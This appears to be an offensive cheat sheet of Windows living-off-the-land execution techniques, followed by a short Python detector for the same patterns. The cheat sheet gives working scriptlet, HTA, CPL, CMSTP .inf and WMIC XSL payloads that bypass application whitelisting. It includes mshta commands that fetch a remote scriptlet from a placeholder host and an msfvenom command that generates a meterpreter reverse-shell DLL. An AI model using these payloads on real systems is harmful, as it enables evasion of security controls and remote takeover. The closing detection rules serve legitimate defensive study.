Windows Code Execution
regsvr32
m.sct
<?XML version="1.0"?>
<scriptlet>
<registration
  progid="TESTING"
  classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
  <script language="JScript">
    <![CDATA[
      var foo = new ActiveXObject("WScript.Shell").Run("calc.exe");
    ]]>
  </script>
</registration>
</scriptlet>
Execute
MSHTA
m.sct
<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>
<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
    function Exec() {
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    }
]]>
</script>
</scriptlet>
Execute
# from powershell
cmd /c start /b mshta.exe "javascript:a=(GetObject('script:http://ip/m.sct')).Exec();close();"
mshta.exe "javascript:a=(GetObject('script:http://ip/m.sct')).Exec();close();"
# from cmd
mshta.exe javascript:a=(GetObject('script:http://ip/m.sct')).Exec();close();
HTA
m.hta
<html>
<head>
<script language="VBScript">
    Sub RunProgram
        Set objShell = CreateObject("Wscript.Shell")
        objShell.Run "calc.exe"
    End Sub
    RunProgram()
</script>
</head>
<body>
    Nothing to see here..
</body>
</html>
Execute
Control Panel Item
The .cpl file needs to export a function named CPlApplet for Windows to recognize it as a Control Panel item.
Once the DLL is compiled and renamed to .cpl, it can simply be double-clicked and runs like a regular Windows .exe file.
After compiling the DLL, use CFF Explorer to confirm that CPlApplet appears in its export table.
// Windows 10, Visual Studio 2022 build
// dllmain.cpp : Defines the entry point for the DLL application.
// #include "stdafx.h"   // older Visual Studio project templates use this instead of pch.h
#include "pch.h"
#include <Windows.h>

// CPlApplet is the entry point Windows resolves by name when it opens a .cpl,
// so it must be exported undecorated (extern "C") with exactly this spelling.
extern "C" __declspec(dllexport) LONG CPlApplet(
    HWND hwndCpl,
    UINT msg,
    LPARAM lParam1,
    LPARAM lParam2
)
{
    MessageBoxA(NULL, "Hey there, I am now your control panel item you know.", "Control Panel", 0);
    return 1;
}

BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD  ul_reason_for_call,
                      LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Also fire as soon as the DLL is loaded, so the message box appears
        // regardless of which CPlApplet messages the host sends.
        CPlApplet(NULL, 0, 0, 0);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
CMSTP
Generating a reverse shell payload as a DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=8888 -f dll > /root/desktop/evil.dll
Creating an .inf file that will be loaded by the CMSTP.exe binary, which in turn loads our evil.dll
f.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
path to\evil.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="cmstp"
ShortSvcName="cmstp"
Invoking the payload
Forfiles Indirect Command Execution
Search the current directory for evil.exe and execute it when found
Search the specified directory for evil.exe and execute it when found
Application Whitelisting Bypass with WMIC and XSL
evil.xsl
<?xml version='1.0'?>
<stylesheet
    xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
    xmlns:user="placeholder"
    version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc");
    ]]>
    </ms:script>
</stylesheet>
Now invoke any wmic command and pass /format pointing at the evil.xsl
PowerShell Without Powershell.exe
GitHub | PowerShdll
SyncAppvPublishingServer
# from PowerShell
SyncAppvPublishingServer.vbs break; [command]
SyncAppvPublishingServer.exe break; [command]
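The techniques above share a recognizable shape on the process command line: mshta given an inline javascript: URL that fetches a script: object, wmic /format pointing at a stylesheet instead of a built-in format name, cmstp handed an .inf, and SyncAppvPublishingServer with an injected break;. As an added example that is not part of the original page, this Python checker runs those rules over constructed sample command lines; the regexes, labels and sample lines are mine (the ip, m.sct, evil.xsl and f.inf names are the page's placeholders).

```python
import re

# Command-line rules for the living-off-the-land patterns shown on this page;
# each regex is searched against a process-creation command line.
RULES = [
    # mshta running inline JavaScript that pulls a remote scriptlet (MSHTA section)
    ("mshta remote scriptlet",
     re.compile(r"\bmshta(\.exe)?\b.*javascript:.*getobject\(\s*['\"]script:", re.I)),
    # wmic /format given a stylesheet path or URL instead of a built-in
    # format name such as list or csv (WMIC and XSL section)
    ("wmic /format custom XSL",
     re.compile(r"\bwmic(\.exe)?\b.*/format:\s*['\"]?[^\s'\"]*(\.xsl\b|://|\\)", re.I)),
    # cmstp handed an .inf file on the command line (CMSTP section)
    ("cmstp .inf load",
     re.compile(r"\bcmstp(\.exe)?\b.*\S+\.inf\b", re.I)),
    # SyncAppvPublishingServer with an injected 'break;' (SyncAppvPublishingServer section)
    ("SyncAppvPublishingServer injection",
     re.compile(r"syncappvpublishingserver\.(vbs|exe)\b.*\bbreak\s*;", re.I)),
]

def check_command_line(cmdline):
    """Return the labels of every rule whose pattern matches cmdline."""
    return [label for label, pattern in RULES if pattern.search(cmdline)]

def scan(cmdlines):
    """Map each command line that fired at least one rule to its labels."""
    hits = {}
    for cmdline in cmdlines:
        labels = check_command_line(cmdline)
        if labels:
            hits[cmdline] = labels
    return hits

# Constructed sample process-creation command lines; 'ip' is the page's placeholder.
SAMPLE_CMDLINES = [
    "mshta.exe javascript:a=(GetObject('script:http://ip/m.sct')).Exec();close();",
    "mshta.exe \"C:\\Program Files\\Vendor\\setup.hta\"",      # benign local HTA
    "wmic os get caption /format:list",                          # built-in format
    "wmic process list /format:\"C:\\Users\\Public\\evil.xsl\"",
    "cmstp.exe C:\\Users\\Public\\f.inf",
    "SyncAppvPublishingServer.vbs \"break; calc.exe\"",
]

if __name__ == "__main__":
    for cmdline, labels in scan(SAMPLE_CMDLINES).items():
        print(", ".join(labels), "<-", cmdline)
```

The two benign lines stay silent, so the built-in wmic formats and local .hta launches do not generate noise.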